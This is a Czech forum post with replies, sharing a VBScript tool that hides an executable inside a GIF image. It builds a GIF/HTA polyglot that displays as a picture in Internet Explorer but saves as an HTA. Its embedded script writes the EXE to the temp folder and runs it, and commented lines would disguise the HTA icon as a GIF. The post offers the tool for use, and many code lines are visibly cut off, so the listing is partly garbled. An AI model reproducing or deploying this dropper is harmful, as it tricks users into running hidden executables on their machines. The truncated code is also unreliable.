Steganography hide EXE data within a GIF image


Steganography hide EXE data within a GIF image #
objevil jsem dost good vbs script který schová do *.GIF souboru spustitelný kód ... A nejlepší na tom je že v IE a firefox se ten obrázek zobraí a když naněj kliknete pravým tlačítkem na myši a dáte "Uložit Jako .." tak se Uloží jak SOUBOR.HTA ve kterém je spustitelný kód ....

Toto je odkaz na autora [link]

v tomto obrázku je prográmek na Hypnotic (hypnotyzování točící se spirála)
'Zdrojový kód
' Title: Steganography: Hiding Data Within Data.
' Author: Vengy! (-_-)
' Tested: WinXP SP2 IE 6.0
' Email:

' How it works:
' -------------
' Usage: cscript.exe hide.vbs your.gif your.exe

' This script merges "your.gif" and "your.exe" to create "your.gif.hta.gif",
' which correctly displays using the IE browser. ;)
' If the 'Hide extension for known file types' option is enabled, which is the default setting,
' the "Save Picture As..." downloads it as "your.gif". (it's really "your.gif.hta")

' Important:
' ----------
' Not all GIFs will work!? Trial and error is the best method
' to find suitable images. Included are some working GIFs that
' will merge correctly with any EXE. The image "your.gif" must be a GIF89a type and *not* GIF87a.

' GIF87a Versus GIF89a:
' ---------------------
' There are technically two types of GIF file: GIF87a and the newer, improved GIF89a.
' Both are fully supported on most browsers, and both use .gif as their file name suffix.
' GIF87a is the original format for indexed color images.
' It uses LZW compression and has the option of being interlaced.

' GIF89a is the same, but also includes transparency and animation capabilities.
' If you want to add these features to your graphic, you'll need to create the graphic with a tool
' that supports the GIF89a format. These features have become so popular with web developers that
' this format has become thede facto standard on the Web today.

' +------------------------------------------
' | Let the games begin! |
' +------------------------------------------

Option Explicit

Dim data,p,i,f,file,ub,ts,pic_buf,pic,args,x

set args=WScript.Arguments

If args.Count<>2 Then
WScript.Echo "Please type the following: cscript.exe hide.vbs your.gif your.exe"
End If


Dim o:Set o=CreateObject("Scripting.FileSystemObject"
Dim s:Set s=CreateObject("WScript.Shell")

'To change the HTA file icon to a GIF, uncomment these 2 lines:
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\","GIF Image","REG_SZ"
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\DefaultIcon\

Set f=o.CreateTextFile(pic&".hta.gif",2)

WScript.Echo "Processing "&pic&" ..."


' Remove end of gif hex tag 3B.
f.Write Left(pic_buf,len(pic_buf)-1)

' +------------------------------------------
' | BEGIN: GIF comment block. |
' +------------------------------------------

' Start new block tag.
f.Write chr(Int("&H21"))

' Comment tag.
f.Write chr(Int("&HFE"))

' Length of subblock. Seems to work!?
f.Write chr(Int("&HFF"))

' Start data vbscript
f.WriteLine "<script language=vbs>"
f.WriteLine "Set o=CreateObject("&chr(34)&"Scripting
f.WriteLine "Set s=CreateObject("&chr(34)&"WScript.S
f.WriteLine "p=o.GetSpecialFolder(2)&"&chr(34)&

' Create data hex array.
f.Write "t=split("&chr(34)
WScript.Echo "Processing "&file&" ..."
For i=0 To ub-1
f.Write data(i)&","
f.Write data(ub)
f.WriteLine chr(34)&","&chr(34)&","&chr

f.WriteLine "Set f=o.CreateTextFile(p,2)"
f.WriteLine "For i=0 To UBound(t)"
f.WriteLine "f.Write chr(Int("&chr(34)&"&H"&chr(
f.WriteLine "Next"
f.WriteLine "f.close"

' Run the data!
f.WriteLine ""

f.WriteLine "close()"

' End data vbscript.
f.WriteLine "</script>"

' End of comment block.
f.Write chr(Int("&H00"))

' +------------------------------------------
' | END: GIF comment block. |
' +------------------------------------------

' Insert end of gif tag.
f.Write chr(Int("&H3B"))


' +------------------------------------------
' | Done. Your.gif.hta.gif has been created. |
' +------------------------------------------

Set x=o.GetFile(pic&".hta.gif")

WScript.Echo "Created "&chr(34)&pic&".hta.gif"&ch
r(34)&" (bytes="&x.Size&")"

' +------------------------------------------
' | Turns ASCII string sData into array of hex numerics. |
' +------------------------------------------
Function AsciiToHex(sData)
Dim i, aTmp()

ReDim aTmp(Len(sData) - 1)

For i = 1 To Len(sData)
aTmp(i - 1) = Hex(Asc(Mid(sData, i)))
If len(aTmp(i - 1))=1 Then aTmp(i - 1)="0"+ aTmp(i - 1)

ASCIItoHex = aTmp
End Function

' +------------------------------------------
' | Converts binary data to a string (BSTR) using ADO recordset. |
' +------------------------------------------
Function RSBinaryToString(xBinary)
Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)

If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS("mBinary").AppendChunk Binary
RSBinaryToString = RS("mBinary")
RSBinaryToString = ""
End If
End Function

' +------------------------------------------
' | Read Binary file |
' +------------------------------------------
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream : Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function

BOGIIE & Hacker112 | 85.207.107.*26.12.2006 10:14
re: Steganography hide EXE data within a GIF imag#
Dobrá věcička :)
(odpovědět) | 88.146.11.*26.12.2006 13:51
re: Steganography hide EXE data within a GIF image #
V Opeře nejde 8-) je to asi bezpečný prohlížeč. Ale je docela LOL!!

nehádej se, nemá to cenu | osobní blog: [link]
mzk | E-mail | Website26.12.2006 15:47
re: Steganography hide EXE data within a GIF imag#
Kombinace FF 2 a W98 taky nefacha..
Nemam | 72.22.69.*26.12.2006 16:21